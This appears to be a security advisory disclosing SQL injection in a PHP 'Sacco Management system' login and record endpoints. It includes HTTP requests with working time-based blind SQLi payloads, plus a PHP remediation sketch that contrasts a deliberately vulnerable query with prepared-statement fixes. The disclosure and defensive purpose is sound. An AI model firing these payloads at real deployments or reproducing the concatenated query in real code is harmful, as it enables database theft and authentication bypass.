Affected Version: “Sacco Management system”
Security Issue:
SQL injection via the GET parameters password and id
URL: <http://localhost/sacco/ajax.php>
Parameter: password
URLs:
<http://localhost/sacco/ajax.php>
<http://localhost/sacco/load_fields.php>
<http://localhost/sacco/manage_loan.php>
<http://localhost/sacco/manage_borrower.php>
<http://localhost/sacco/manage_user.php>
Parameter: id
Vulnerability Description:
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
HTTP Request:
POST /sacco/load_fields.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: <http://localhost/sacco/>
Cookie: PHPSESSID=jpf03ug3v00hai12gb9gimprtt
Content-Length: 47
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
&id=if(now()=sysdate()%2Csleep(4)%2C0)&loan_id=

POST /sacco/ajax.php?action=login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: <http://localhost/sacco/>
Content-Length: 66
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
password=0'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'Z&username=1
HTTP Response:


Proof of Exploit:
SQL query - SELECT database()
sacco
The impact of this vulnerability:
An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
How to fix this vulnerability:
Use parameterized queries (prepared statements) for every SQL statement that contains user input. A parameterized query sends the SQL text to the database separately from the values, so the database knows which parts are user input and never parses them as SQL, which prevents SQL injection. Validating the type of each parameter before use (for example, rejecting a non-numeric id) is a useful additional check.
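As an added example (not code from the Sacco Management system, whose source is not shown here), the following PHP sketch places a hypothetical reconstruction of the vulnerable string-concatenation pattern next to a parameterized version for the two affected endpoints, the login handler behind ajax.php?action=login and the id lookup behind load_fields.php. The table and column names (users, username, password, loans, borrower_id, amount), the mysqli connection and the use of password_hash()/password_verify() for the stored password are assumptions.

```php
<?php
// Added example, not code from the Sacco Management system.
// Table/column names and the mysqli connection are assumptions.

// --- Vulnerable pattern (hypothetical reconstruction, shown for contrast).
// The submitted values are pasted into the statement text, so a value like
//   0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
// is parsed and executed as SQL, which is what the time-based probe above relies on.
function login_vulnerable(mysqli $db, string $username, string $password): ?array
{
    $sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// --- Fixed login: prepared statement with a bound parameter. The SQL text is
// compiled first; the username travels separately and is only ever a value.
// The password is checked against a stored hash, never compared inside SQL.
function login_safe(mysqli $db, string $username, string $password): ?array
{
    $stmt = $db->prepare("SELECT id, username, password FROM users WHERE username = ?");
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Assumed: the password column holds a password_hash() value.
    if ($row && password_verify($password, $row['password'])) {
        unset($row['password']);
        return $row;
    }
    return null;
}

// --- Fixed field loader: the id is validated as a positive integer before any
// query runs, so a value such as if(now()=sysdate(),sleep(4),0) is rejected
// with a 400, and the accepted value is bound as an integer, not spliced in.
function load_loan_fields_safe(mysqli $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT id, borrower_id, amount FROM loans WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc() ?: null;
    $stmt->close();
    return $row;
}

// Usage (placeholders for the real credentials; the database name 'sacco' is
// the one returned by SELECT database() in the proof above):
// mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// $db   = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'sacco');
// $user = login_safe($db, $_POST['username'] ?? '', $_POST['password'] ?? '');
// $loan = load_loan_fields_safe($db, $_POST['id'] ?? '');
```

mysqli_stmt::get_result() needs the mysqlnd driver; on builds without it, use bind_result()/fetch() instead. The same split applies to manage_loan.php, manage_borrower.php and manage_user.php: every place the id parameter reaches a query should go through a validated, bound integer like load_loan_fields_safe() rather than string concatenation.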